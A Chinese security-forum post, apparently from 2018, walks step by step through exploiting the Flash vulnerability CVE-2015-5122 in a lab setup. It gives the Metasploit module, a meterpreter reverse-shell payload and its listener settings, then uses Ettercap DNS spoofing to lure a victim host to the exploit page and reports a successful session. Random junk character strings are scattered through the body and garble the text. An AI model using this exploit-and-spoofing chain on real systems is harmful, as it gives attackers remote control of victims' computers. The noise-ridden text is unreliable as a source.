找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1378|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

5 a$ [8 @; ?* o; \- _+ n 二、cve2015-5122漏洞实例演示虚拟机 + [& T/ R: D) C

9 S! l7 K$ H1 Q& Y0 g) H

% S" {* Z* N2 u3 E) a. O! n   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: : K" R4 v0 Z* Y

, _2 a8 L+ c. H, D

, X/ B& K& t+ O9 F: A, i: i search cve-2015-5122如图: 5 {, b0 D& T3 y% Y

) }7 V, `* s Y4 H3 j J/ O7 O

_0 W/ i9 q/ p   ' z3 k8 b0 F+ j- L. P& p0 N

, {) b2 n {% w% a

% j$ Q6 m$ P3 [1 p4 R 下面我们敲如下命令: * @# V9 G0 I) J$ i9 g% [; L* p$ t

5 r% y9 ~, o6 Q3 l( o2 e

* _+ K1 h- ^% T) n+ J use exploit/multi/browser/adobe_flash_opaque_background_uaf % n: m( F. F7 { V

5 Y2 N; D( `- ?) P9 ^

$ k+ Y- y3 T6 h4 p) \+ d& N" I set PAYLOAD windows/meterpreter/reverse_tcp / L- z* u1 { j3 ~4 O

1 `1 k" W* {, f$ J! o

. b c$ J6 m% V+ I/ w set LHOST 192.168.0.109 / `8 I6 l+ j( b) E

3 q/ t0 c; c' O# B+ Q- [

5 @2 [, T- |1 Y5 ^" V0 E set URIPATH /                        /*根目录*/ ; s% Z6 y$ A2 V- V

7 A, X, X- e: E

% n9 S& q$ J x# J i$ X set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 ' l' ]! e5 Y& E) M

) t, Z7 u9 j' I

# W! x$ U9 P9 o( r$ i9 o, h set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 # ~6 N/ Q7 ? ]& K. J1 G

* S# l7 ]6 T) [% ]. N+ z! |

; t8 Q1 Q% s( Q+ i: _* m0 g; r 然后show options如图: ' m! K! r* O8 Q1 N

' h9 _( G \+ Z" t+ `! w" n/ U1 T

! u7 l$ x6 Z1 ~7 V/ u, g) t" J R* w2 R   , q6 Z' ^# @3 x

3 Z5 x% t% m' I6 D

$ I; [1 r( y0 ^3 f7 @' Z 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
( F o) u( P6 |0 J! I
. e0 ?& u& }$ K, m: X$ p7 o

4 z4 S$ V% p8 b; P$ p

5 F. \- f+ ~" E/ p" x 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 9 V0 \% d( A$ @* w

, U- d! O7 O. E

- o6 ~' e4 d3 g( @2 U Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf 5 i: n0 d: B: @8 m" H8 J

4 [- k6 D. Q$ E( U3 R, x. w

9 d7 W9 p" ?. b) J   6 B/ Z( r$ M" G7 V& S

2 {) G* y J) n( e

3 g" C4 _' ~! g T% @; [: V 成功了,这时候我们断开ettercap,如图: % B8 p) _; t0 i% U( z5 _5 Z

, K) h [+ o: f( Q" u: z2 K! S6 }

/ Q; {0 p% G+ \   , B9 D+ K3 m, S9 Z s

- _5 o7 ]- g& ?( U- @

[4 G# U3 E, o9 V* l! ` Screenshot如图: 2 X" \3 F% a6 H4 ]: g

8 m2 Y' O3 X+ d0 C h

1 |" V. g) U, e' E2 k6 U4 b _5 {   5 r0 F" z7 w- w9 B% W

, s/ t: o a! p) x' Y( X

0 z5 w5 [$ G! B5 p& {, r " l7 F# c+ ~7 }* v2 n6 k9 R+ H* [

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表